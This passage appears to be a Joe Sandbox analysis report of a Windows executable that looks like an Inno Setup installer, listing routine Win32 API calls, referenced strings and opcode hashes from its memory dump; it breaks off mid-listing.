                                                                          • GetVersion.KERNEL32 ref: 00462588
                                                                          • SendMessageA.USER32(00000000,0000112C,00000004,00000004), ref: 004625C6
                                                                          • SHGetFileInfo.SHELL32(00462664,00000000,?,00000160,00004011), ref: 004625E3
                                                                          • LoadCursorA.USER32(00000000,00007F02), ref: 00462601
                                                                          • SetCursor.USER32(00000000,00000000,00007F02,00462664,00000000,?,00000160,00004011), ref: 00462607
                                                                          • SetCursor.USER32(?,00462647,00007F02,00462664,00000000,?,00000160,00004011), ref: 0046263A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: ClassCursor$Info$FileLoadMessageRegisterSendUnregisterVersion
                                                                          • String ID: Explorer
                                                                          • API String ID: 2594429197-512347832
                                                                          • Opcode ID: 9e551b61376fb9e9f1f73c85b443bf32257c614818600361488d0c8e10dcc30c
                                                                          • Instruction ID: 5d8862978945b954f1aea40d900f189da683ff410d790468fedd90432f5e16a2
                                                                          • Opcode Fuzzy Hash: 9e551b61376fb9e9f1f73c85b443bf32257c614818600361488d0c8e10dcc30c
                                                                          • Instruction Fuzzy Hash: DE21E7707407047AE725BB798D47F9A76D89B08708F50407FB605EA1C3E9BD8C1486AE
                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,02332BDC,?,?,?,02332BDC,00476FDC,00000000,004770FA,?,?,-00000010,?), ref: 00476E31
                                                                          • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00476E37
                                                                          • GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02332BDC,?,?,?,02332BDC,00476FDC,00000000,004770FA,?,?,-00000010,?), ref: 00476E4A
                                                                          • CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02332BDC,?,?,?,02332BDC), ref: 00476E74
                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,02332BDC,00476FDC,00000000,004770FA,?,?,-00000010,?), ref: 00476E92
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: FileHandle$AddressAttributesCloseCreateModuleProc
                                                                          • String ID: GetFinalPathNameByHandleA$kernel32.dll
                                                                          • API String ID: 2704155762-2318956294
                                                                          • Opcode ID: 8cfa0abb3559021c6ef5ceae513d3fa85427733fdb4d87d7d1e91b32a0a746f4
                                                                          • Instruction ID: d2756be845a9a7cec8c09e5f4573334ab46b2fb936870a4cb364c11667d86bc7
                                                                          • Opcode Fuzzy Hash: 8cfa0abb3559021c6ef5ceae513d3fa85427733fdb4d87d7d1e91b32a0a746f4
                                                                          • Instruction Fuzzy Hash: E301D654340F0436EA30317A8C86FBB644E8B40769F158137BA1CEA2D2DAAC8D15127E
                                                                          APIs
                                                                          • RtlEnterCriticalSection.KERNEL32(0049A420,00000000,00401B68), ref: 00401ABD
                                                                          • LocalFree.KERNEL32(006A37C0,00000000,00401B68), ref: 00401ACF
                                                                          • VirtualFree.KERNEL32(?,00000000,00008000,006A37C0,00000000,00401B68), ref: 00401AEE
                                                                          • LocalFree.KERNEL32(006A47C0,?,00000000,00008000,006A37C0,00000000,00401B68), ref: 00401B2D
                                                                          • RtlLeaveCriticalSection.KERNEL32(0049A420,00401B6F), ref: 00401B58
                                                                          • RtlDeleteCriticalSection.KERNEL32(0049A420,00401B6F), ref: 00401B62
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                          • String ID: Mj
                                                                          • API String ID: 3782394904-209792402
                                                                          • Opcode ID: 129a086d14f06e85949d9ce6c11842cbaac0837872500e74c5770b3ac3f1f746
                                                                          • Instruction ID: 4ef907ce7de5879ae286245a644ba6b68361dc01c28fd2a698a6758b772d8c96
                                                                          • Opcode Fuzzy Hash: 129a086d14f06e85949d9ce6c11842cbaac0837872500e74c5770b3ac3f1f746
                                                                          • Instruction Fuzzy Hash: C9114270A403405AEB15AB659C89B263BE597A570CF54407BF80067AF2D7BC5860C7EF
                                                                          APIs
                                                                          • GetLastError.KERNEL32(00000000,004596AE,?,00000000,00000000,00000000,?,00000006,?,00000000,00495CC7,?,00000000,00495D6A), ref: 004595F2
                                                                            • Part of subcall function 00453910: FindClose.KERNEL32(000000FF,00453A06), ref: 004539F5
                                                                          Strings
                                                                          • Failed to delete directory (%d). Will delete on restart (if empty)., xrefs: 00459667
                                                                          • Failed to delete directory (%d). Will retry later., xrefs: 0045960B
                                                                          • Failed to strip read-only attribute., xrefs: 004595C0
                                                                          • Not stripping read-only attribute because the directory does not appear to be empty., xrefs: 004595CC
                                                                          • Stripped read-only attribute., xrefs: 004595B4
                                                                          • Failed to delete directory (%d)., xrefs: 00459688
                                                                          • Deleting directory: %s, xrefs: 0045957B
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CloseErrorFindLast
                                                                          • String ID: Deleting directory: %s$Failed to delete directory (%d).$Failed to delete directory (%d). Will delete on restart (if empty).$Failed to delete directory (%d). Will retry later.$Failed to strip read-only attribute.$Not stripping read-only attribute because the directory does not appear to be empty.$Stripped read-only attribute.
                                                                          • API String ID: 754982922-1448842058
                                                                          • Opcode ID: 57e0c8ccebeb7184da741e20b7d6bda7044560dbf179fd464141c630ba455fd8
                                                                          • Instruction ID: 65fff70db6fa7d9e45c4e30736062023b7b7828f3df3317cc7ecb80ce87614ba
                                                                          • Opcode Fuzzy Hash: 57e0c8ccebeb7184da741e20b7d6bda7044560dbf179fd464141c630ba455fd8
                                                                          • Instruction Fuzzy Hash: 7841A330A04209DBCB11DB6AC8013AE76A55F49306F55857FAC0197393DB7C8E0D876E
                                                                          APIs
                                                                          • GetCapture.USER32 ref: 00422EB4
                                                                          • GetCapture.USER32 ref: 00422EC3
                                                                          • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 00422EC9
                                                                          • ReleaseCapture.USER32 ref: 00422ECE
                                                                          • GetActiveWindow.USER32 ref: 00422EDD
                                                                          • SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 00422F5C
                                                                          • SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 00422FC0
                                                                          • GetActiveWindow.USER32 ref: 00422FCF
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CaptureMessageSend$ActiveWindow$Release
                                                                          • String ID:
                                                                          • API String ID: 862346643-0
                                                                          • Opcode ID: 0c435bf511bce9c0c4602d4c311bc19cd41662654068aa8a958521a418b0f2a9
                                                                          • Instruction ID: db8aa600a50c93bece591f99e5806f4c3f5e9428d1b568cd9ed9aa9c7d903083
                                                                          • Opcode Fuzzy Hash: 0c435bf511bce9c0c4602d4c311bc19cd41662654068aa8a958521a418b0f2a9
                                                                          • Instruction Fuzzy Hash: 0A413F70B00254AFDB10EB6ADA42B9A77F1EF44304F5540BAF540AB392DB789E40DB5D
                                                                          APIs
                                                                          • GetWindowLongA.USER32(?,000000F0), ref: 0042F12E
                                                                          • GetWindowLongA.USER32(?,000000EC), ref: 0042F145
                                                                          • GetActiveWindow.USER32 ref: 0042F14E
                                                                          • MessageBoxA.USER32(00000000,00000000,00000000,00000000), ref: 0042F17B
                                                                          • SetActiveWindow.USER32(?,0042F2AB,00000000,?), ref: 0042F19C
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Window$ActiveLong$Message
                                                                          • String ID:
                                                                          • API String ID: 2785966331-0
                                                                          • Opcode ID: c7dbdf512a8bb369b5ca2387ecc1fddd3cb33d730422a6841e9b046abbe32e7f
                                                                          • Instruction ID: 66ba457b2775015b13cc3341b2fd0efd1cc0de66d5492798f2afbbc1fd9aa33e
                                                                          • Opcode Fuzzy Hash: c7dbdf512a8bb369b5ca2387ecc1fddd3cb33d730422a6841e9b046abbe32e7f
                                                                          • Instruction Fuzzy Hash: 7B31B474A00654EFDB01EFB6DC52D6EBBB8EB09714F9144BAF804E3291D6399D10CB68
                                                                          APIs
                                                                          • 73A0A570.USER32(00000000), ref: 0042949A
                                                                          • GetTextMetricsA.GDI32(00000000), ref: 004294A3
                                                                            • Part of subcall function 0041A1F8: CreateFontIndirectA.GDI32(?), ref: 0041A2B7
                                                                          • SelectObject.GDI32(00000000,00000000), ref: 004294B2
                                                                          • GetTextMetricsA.GDI32(00000000,?), ref: 004294BF
                                                                          • SelectObject.GDI32(00000000,00000000), ref: 004294C6
                                                                          • 73A0A480.USER32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 004294CE
                                                                          • GetSystemMetrics.USER32(00000006), ref: 004294F3
                                                                          • GetSystemMetrics.USER32(00000006), ref: 0042950D
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Metrics$ObjectSelectSystemText$A480A570CreateFontIndirect
                                                                          • String ID:
                                                                          • API String ID: 361401722-0
                                                                          • Opcode ID: ddddefcdf100d818f5398c04065f48e60301a070589a14b18048d2092dd0edfb
                                                                          • Instruction ID: 4657f5dde1e086c017b18360b1712f1689f4efb7679c0f09225e2053bbf18421
                                                                          • Opcode Fuzzy Hash: ddddefcdf100d818f5398c04065f48e60301a070589a14b18048d2092dd0edfb
                                                                          • Instruction Fuzzy Hash: F701E1917087513BFB11B67A9CC2F6B61D8CB84358F44043FFA459A3D2D96C9C80866A
                                                                          APIs
                                                                          • 73A0A570.USER32(00000000,?,00419069,004970A2), ref: 0041DE37
                                                                          • 73A14620.GDI32(00000000,0000005A,00000000,?,00419069,004970A2), ref: 0041DE41
                                                                          • 73A0A480.USER32(00000000,00000000,00000000,0000005A,00000000,?,00419069,004970A2), ref: 0041DE4E
                                                                          • MulDiv.KERNEL32(00000008,00000060,00000048), ref: 0041DE5D
                                                                          • GetStockObject.GDI32(00000007), ref: 0041DE6B
                                                                          • GetStockObject.GDI32(00000005), ref: 0041DE77
                                                                          • GetStockObject.GDI32(0000000D), ref: 0041DE83
                                                                          • LoadIconA.USER32(00000000,00007F00), ref: 0041DE94
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: ObjectStock$A14620A480A570IconLoad
                                                                          • String ID:
                                                                          • API String ID: 2920975243-0
                                                                          • Opcode ID: 8a3f536ffb6670d269bd6af103e53ebc3d3cf5e2ae60cc691583456349148664
                                                                          • Instruction ID: b4cf756beaef1adc4f5fbcf44fabff1cc3cb88bfcb9329de381bdc5a6adb432b
                                                                          • Opcode Fuzzy Hash: 8a3f536ffb6670d269bd6af103e53ebc3d3cf5e2ae60cc691583456349148664
                                                                          • Instruction Fuzzy Hash: 88113DB06443015EE740FF665896BAA3690DB24708F04813FF645AF2D2DB7D1CA49BAE
                                                                          APIs
                                                                          • LoadCursorA.USER32(00000000,00007F02), ref: 00462A6C
                                                                          • SetCursor.USER32(00000000,00000000,00007F02,00000000,00462B01), ref: 00462A72
                                                                          • SetCursor.USER32(?,00462AE9,00007F02,00000000,00462B01), ref: 00462ADC
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Cursor$Load
                                                                          • String ID: $ $Internal error: Item already expanding
                                                                          • API String ID: 1675784387-1948079669
                                                                          • Opcode ID: ad683674f4580f1e1aa17f5a9c1d46edd0719ef7fbd07970485d4df48dda1b37
                                                                          • Instruction ID: 09c47418b275a9072aadbefc454c559749aab815838d7f365e24efc4a4a37fb5
                                                                          • Opcode Fuzzy Hash: ad683674f4580f1e1aa17f5a9c1d46edd0719ef7fbd07970485d4df48dda1b37
                                                                          • Instruction Fuzzy Hash: 0DB1A530600A04EFD720DF69D685B9ABBF1FF44304F1484AAE8459B7A2D7B8ED45CB19
                                                                          APIs
                                                                          • GetClassInfoW.USER32(00000000,COMBOBOX,?), ref: 00475755
                                                                          • 73A159E0.USER32(00000000,000000FC,004756B0,00000000,00475994,?,00000000,004759BE), ref: 0047577C
                                                                          • GetACP.KERNEL32(00000000,00475994,?,00000000,004759BE), ref: 004757B9
                                                                          • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 004757FF
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: A159ClassInfoMessageSend
                                                                          • String ID: COMBOBOX$Inno Setup: Language
                                                                          • API String ID: 3375322265-4234151509
                                                                          • Opcode ID: 1ccc6747c3039ead22a329b7f78916889190244fc8c6905f913f87e2f769e72b
                                                                          • Instruction ID: 765adbbab907e06bc7bf6e6f7cf1d32fb8b56d6e7c29df1de031be62d4a3d325
                                                                          • Opcode Fuzzy Hash: 1ccc6747c3039ead22a329b7f78916889190244fc8c6905f913f87e2f769e72b
                                                                          • Instruction Fuzzy Hash: F7815E70A00605DFC710EF69D885A9EB7F5FB09314F1581BAE808EB362D774AD41CB99
                                                                          APIs
                                                                          • GetSystemDefaultLCID.KERNEL32(00000000,00408970,?,?,?,?,00000000,00000000,00000000,?,00409977,00000000,0040998A), ref: 00408742
                                                                            • Part of subcall function 00408570: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049A4C0,00000001,?,0040863B,?,00000000,0040871A), ref: 0040858E
                                                                            • Part of subcall function 004085BC: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,004087BE,?,?,?,00000000,00408970), ref: 004085CF
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: InfoLocale$DefaultSystem
                                                                          • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                                          • API String ID: 1044490935-665933166
                                                                          • Opcode ID: 77a209930b2735c0ddecf28fb65780fc2527dfa24ec1165d9e089488809fe89d
                                                                          • Instruction ID: 5b8a50df068a6b2da3a3ead13541c1976fd8fe610af15afaced6bb711b513b54
                                                                          • Opcode Fuzzy Hash: 77a209930b2735c0ddecf28fb65780fc2527dfa24ec1165d9e089488809fe89d
                                                                          • Instruction Fuzzy Hash: 35513024B00108ABD701FBA69D41A9E77A9DB94304F50C07FA441BB3C6DE3DDE15875E
                                                                          APIs
                                                                          • GetVersion.KERNEL32(00000000,00411909), ref: 0041179C
                                                                          • InsertMenuItemA.USER32(?,000000FF,00000001,0000002C), ref: 0041185A
                                                                            • Part of subcall function 00411ABC: CreatePopupMenu.USER32 ref: 00411AD6
                                                                          • InsertMenuA.USER32(?,000000FF,?,?,00000000), ref: 004118E6
                                                                            • Part of subcall function 00411ABC: CreateMenu.USER32 ref: 00411AE0
                                                                          • InsertMenuA.USER32(?,000000FF,?,00000000,00000000), ref: 004118CD
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Menu$Insert$Create$ItemPopupVersion
                                                                          • String ID: ,$?
                                                                          • API String ID: 2359071979-2308483597
                                                                          • Opcode ID: 57ccdcba8889ff27764a16026ea30ef1297fbdf3a800011468703812a277a737
                                                                          • Instruction ID: bc3149483dfa03cdc0807f0a56c3f90cc05caec19bb46b1e0c32919a2f580dbf
                                                                          • Opcode Fuzzy Hash: 57ccdcba8889ff27764a16026ea30ef1297fbdf3a800011468703812a277a737
                                                                          • Instruction Fuzzy Hash: 95512674A00144ABDB00EF6ADC816EA7BF9AF09304B11817BFA04E73A6D738C941CB5C
                                                                          APIs
                                                                          • GetObjectA.GDI32(?,00000018,?), ref: 0041BF38
                                                                          • GetObjectA.GDI32(?,00000018,?), ref: 0041BF47
                                                                          • GetBitmapBits.GDI32(?,?,?), ref: 0041BF98
                                                                          • GetBitmapBits.GDI32(?,?,?), ref: 0041BFA6
                                                                          • DeleteObject.GDI32(?), ref: 0041BFAF
                                                                          • DeleteObject.GDI32(?), ref: 0041BFB8
                                                                          • CreateIcon.USER32(00400000,?,?,?,?,?,?), ref: 0041BFD5
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Object$BitmapBitsDelete$CreateIcon
                                                                          • String ID:
                                                                          • API String ID: 1030595962-0
                                                                          • Opcode ID: c1e7ff30722f84a59b7c576368abad4b11806281d6eddf659bf093bc56a2286c
                                                                          • Instruction ID: b628a60b6e344882d317dd96d191c0cb792f95d1e2fbfe9e34044ce63643746d
                                                                          • Opcode Fuzzy Hash: c1e7ff30722f84a59b7c576368abad4b11806281d6eddf659bf093bc56a2286c
                                                                          • Instruction Fuzzy Hash: 48510571E00219AFCB14DFA9C8819EEBBF9EF48314B11442AF914E7391D738AD81CB64
                                                                          APIs
                                                                          • SetStretchBltMode.GDI32(00000000,00000003), ref: 0041CF0E
                                                                          • 73A14620.GDI32(00000000,00000026), ref: 0041CF2D
                                                                          • 73A08830.GDI32(?,?,00000001,00000000,00000026), ref: 0041CF93
                                                                          • 73A022A0.GDI32(?,?,?,00000001,00000000,00000026), ref: 0041CFA2
                                                                          • StretchBlt.GDI32(00000000,?,?,?,?,?,00000000,00000000,00000000,?,?), ref: 0041D00C
                                                                          • StretchDIBits.GDI32(?,?,?,?,?,00000000,00000000,00000000,?,?,?,00000000,?), ref: 0041D04A
                                                                          • 73A08830.GDI32(?,?,00000001,0041D07C,00000000,00000026), ref: 0041D06F
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Stretch$A08830$A022A14620BitsMode
                                                                          • String ID:
                                                                          • API String ID: 2733548868-0
                                                                          • Opcode ID: d1728d26c473023a034cda29587c75d8a44e61feb8d5ac31eb3562e546440a0c
                                                                          • Instruction ID: 415929d19c0355200a34ec50ec85ee50bdb26205500aadc12dd1df5ccaef5bc8
                                                                          • Opcode Fuzzy Hash: d1728d26c473023a034cda29587c75d8a44e61feb8d5ac31eb3562e546440a0c
                                                                          • Instruction Fuzzy Hash: 7A514EB0604200AFD714DFA9C995F9BBBF9EF08304F10859AB549DB292C779ED81CB58
                                                                          APIs
                                                                          • SendMessageA.USER32(00000000,?,?), ref: 00456526
                                                                            • Part of subcall function 0042428C: GetWindowTextA.USER32(?,?,00000100), ref: 004242AC
                                                                            • Part of subcall function 0041EEB4: GetCurrentThreadId.KERNEL32 ref: 0041EF03
                                                                            • Part of subcall function 0041EEB4: 73A15940.USER32(00000000,0041EE64,00000000,00000000,0041EF20,?,00000000,0041EF57,?,0042ED24,?,00000001), ref: 0041EF09
                                                                            • Part of subcall function 004242D4: SetWindowTextA.USER32(?,00000000), ref: 004242EC
                                                                          • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0045658D
